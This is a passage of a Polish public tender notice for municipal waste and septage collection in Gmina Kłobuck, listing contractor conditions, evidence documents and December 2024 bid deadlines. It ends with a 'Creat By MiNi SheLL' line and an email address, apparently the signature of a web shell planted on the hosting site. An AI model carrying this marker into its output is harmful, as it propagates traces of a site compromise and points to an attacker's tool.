zakresie.<br/>3.2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>w celu potwierdzenia spełniania przez Wykonawcę tego warunku udziału w postępowaniu Zamawiający żąda złożenia<br/>dokumentu potwierdzającego, że Wykonawca posiada zezwolenie na zbieranie odpadów i zezwolenie na przetwarzanie<br/>odpadów art. 3 ust. 1 pkt 34 oraz art. 3 ust. 1 pkt 21 ustawy odpadach Dz.U.2023.1587 t.j. z dnia 2023.08.10<br/>3.3. Sytuacja ekonomiczna lub finansowa.<br/>Zamawiający uzna, że Wykonawca spełnił ten warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 100 000,00 zł (słownie:<br/>sto tysięcy złotych).<br/>3.4. Zdolność techniczna lub zawodowa<br/>za minimalny poziom zdolności technicznej w zakresie spełnienia warunku posiadania potencjału technicznego;<br/>1) Samochody specjalistyczne spełniające normy<br/>emisji spalin EURO 4 lub EURO 5 lub wyższej lub inne wymagania spełniające techniczne<br/>określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, a<br/>przede wszystkim, rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie<br/>szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli<br/>nieruchomości, w ilości:<br/>- co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych<br/>z pojemników o pojemności 240 l, 1100 l, 2500 l<br/>- co najmniej jeden pojazd asenizacyjny o pojemności co najmniej 5 tys. litrów przystosowany wywozu nieczystości ciekłych<br/>bezpośrednio z szamb bezodpływowych do punktów zlewnych,<br/>b) bazą magazynowo – transportową odpowiednią do przedmiotu zamówienia usytuowaną i wyposażoną zgodnie z<br/>rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania<br/>odpadów komunalnych od właścicieli nieruchomości. Należy zapewnić, aby baza magazynowo- transportowa była<br/>wyposażona w: miejsca przeznaczone do parkowania pojazdów, pomieszczenie socjalne dla pracowników, miejsce do<br/>magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, legalizowaną samochodową wagę<br/>najazdową – w przypadku, gdy na terenie bazy następuje magazynowanie odpadów, na terenie której znajduje się punkt<br/>konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów. Wykonawca musi posiadać tytuł prawny do<br/>terenu i/ lub budowli składającej się na bazę,<br/>c) narzędziami lub urządzeniami umożliwiającymi sprzątanie terenu po opróżnieniu pojemników,<br/>2) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z<br/>terenu Gminy Kłobuck zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie<br/>(Dz.U.2021.888 t.j. z dnia 2021.05.12);<br/>3) aktualne zezwolenie obejmujące prowadzenie działalności w zakresie transportu odpadów, zgodnie z wymogami ustawy z<br/>dnia 14 grudnia 2012 r. o odpadach (Dz.U.2021.779 t.j. z dnia 2021.04.27) lub równoważne, w tym wydane na podstawie<br/>wcześniejszych przepisów w zakresie obejmującym minimum przedmiot zamówienia;<br/>4) wpis do rejestru bazy danych o produktach i opakowaniach oraz gospodarce odpadami (Rejestr <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">5.1. Wykonawca, którego<br/>oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art.<br/>274 ust. 1 ustawy zostanie wezwany do złożenia, w terminie nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych (aktualnych na dzień ich złożenia):<br/>5.1.1. oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie ust. 5.1 składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.2. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu<br/>(określonych przez Zamawiającego w ust. 3 niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy złożenia, w terminie nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych (aktualnych na<br/>dzień ich złożenia):<br/>5.2.1. w celu wykazania spełniania warunku z ust. 3.4. pkt. 1<br/>wykaz sprzętu załącznik nr 6.<br/>5.2.2. w celu wykazania spełniania warunku z ust. 3.4. pkt. 2.<br/>wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy<br/>Kłobuck zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie (Dz.U.2021.888 t.j. z<br/>dnia 2021.05.12);.<br/>5.2.3. w celu wykazania spełniania warunku z ust. 3.4. pkt. 3.<br/>aktualne zezwolenie obejmujące prowadzenie działalności w zakresie transportu odpadów, zgodnie z wymogami ustawy z dnia 14<br/>grudnia 2012 r. o odpadach (Dz.U.2021.779 t.j. z dnia 2021.04.27) lub równoważne, w tym wydane na podstawie wcześniejszych<br/>przepisów w zakresie obejmującym minimum przedmiot zamówienia;<br/>5.2.4.w celu wykazania spełniania warunku z ust. 3.4. pkt. 4.<br/>wpis do rejestru bazy danych o produktach i opakowaniach oraz gospodarce odpadami (Rejestr BDO).<br/>5.3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z wnioskiem o<br/>dopuszczenie do udziału w postępowaniu albo odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy,<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>5.4. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4.3., potwierdza, że stosunek łączący wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>5.4.1. zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>5.4.2. sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>5.4.3. czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty<br/>budowlane lub usługi, których wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">celu<br/>potwierdzenia<br/>spełniania przez Wykonawcę tego warunku udziału w postępowaniu Zamawiający żąda złożenia dokumentu potwierdzającego, że<br/>Wykonawca posiada zezwolenie na zbieranie odpadów i zezwolenie na przetwarzanie odpadów art. 3 ust. 1 pkt 34 oraz art. 3 ust. 1<br/>pkt 21 ustawy odpadach Dz.U.2022.699 t.j. z dnia 2022.03.29.<br/>Zamawiający uzna, że Wykonawca spełnił ten warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie niższej niż 100 000,00 zł (słownie: sto tysięcy złotych).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Samochody specjalistyczne spełniające normy<br/>emisji spalin EURO 4 lub EURO 5 lub wyższej lub inne wymagania spełniające techniczne<br/>określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, a<br/>przede wszystkim, rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie<br/>szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli<br/>nieruchomości, w ilości:<br/>- co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych<br/>z pojemników o pojemności 240 l, 1100 l, 2500 l<br/>- co najmniej jeden pojazd asenizacyjny o pojemności co najmniej 5 tys. litrów przystosowany wywozu nieczystości ciekłych<br/>bezpośrednio z szamb bezodpływowych do punktów zlewnych,<br/>b) bazą magazynowo – transportową odpowiednią do przedmiotu zamówienia usytuowaną i wyposażoną zgodnie z<br/>rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania<br/>odpadów komunalnych od właścicieli nieruchomości. Należy zapewnić, aby baza magazynowo- transportowa była<br/>wyposażona w: miejsca przeznaczone do parkowania pojazdów, pomieszczenie socjalne dla pracowników, miejsce do<br/>magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, legalizowaną samochodową wagę<br/>najazdową – w przypadku, gdy na terenie bazy następuje magazynowanie odpadów, na terenie której znajduje się punkt<br/>konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów. Wykonawca musi posiadać tytuł prawny do<br/>terenu i/ lub budowli składającej się na bazę,<br/>c) narzędziami lub urządzeniami umożliwiającymi sprzątanie terenu po opróżnieniu pojemników,<br/>2) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z<br/>terenu Gminy Kłobuck zgodnie z wymogami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminie<br/>(Dz.U.2021.888 t.j. z dnia 2021.05.12);<br/>3) aktualne zezwolenie obejmujące prowadzenie działalności w zakresie transportu odpadów, zgodnie z wymogami ustawy z<br/>dnia 14 grudnia 2012 r. o odpadach (Dz.U.2021.779 t.j. z dnia 2021.04.27) lub równoważne, w tym wydane na podstawie<br/>wcześniejszych przepisów w zakresie obejmującym minimum przedmiot zamówienia;<br/>4) wpis do rejestru bazy danych o produktach i opakowaniach oraz gospodarce odpadami (Rejestr BDO) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku niezłożenia wraz z ofertą przedmiotowych środków dowodowych o których mowa w Rozdziale XIX ust. 3 SWZ<br/>, lub w przypadku kiedy złożone przedmiotowe środku dowodowe będą niekompletne, zamawiający, zgodnie z art. 107 pkt 2<br/>ustawy Pzp, wezwie wykonawcę do ich złożenia bądź uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź<br/>wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – zgodnie z ust. 3.4 rozdz. XV SWZ – nie dotyczy spółki cywilnej, o ile poważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z<br/>umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub upoważnionego pełnomocnika).5. W przypadku wspólnego<br/>ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1.<br/>rozdziału XV SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w<br/>zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w<br/>postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe<br/>oznacza, iż:5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w<br/>odniesieniu do danego warunku udziału w<br/>postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie<br/>podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.6. Wszelka<br/>korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie<br/>ubiegających<br/>się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com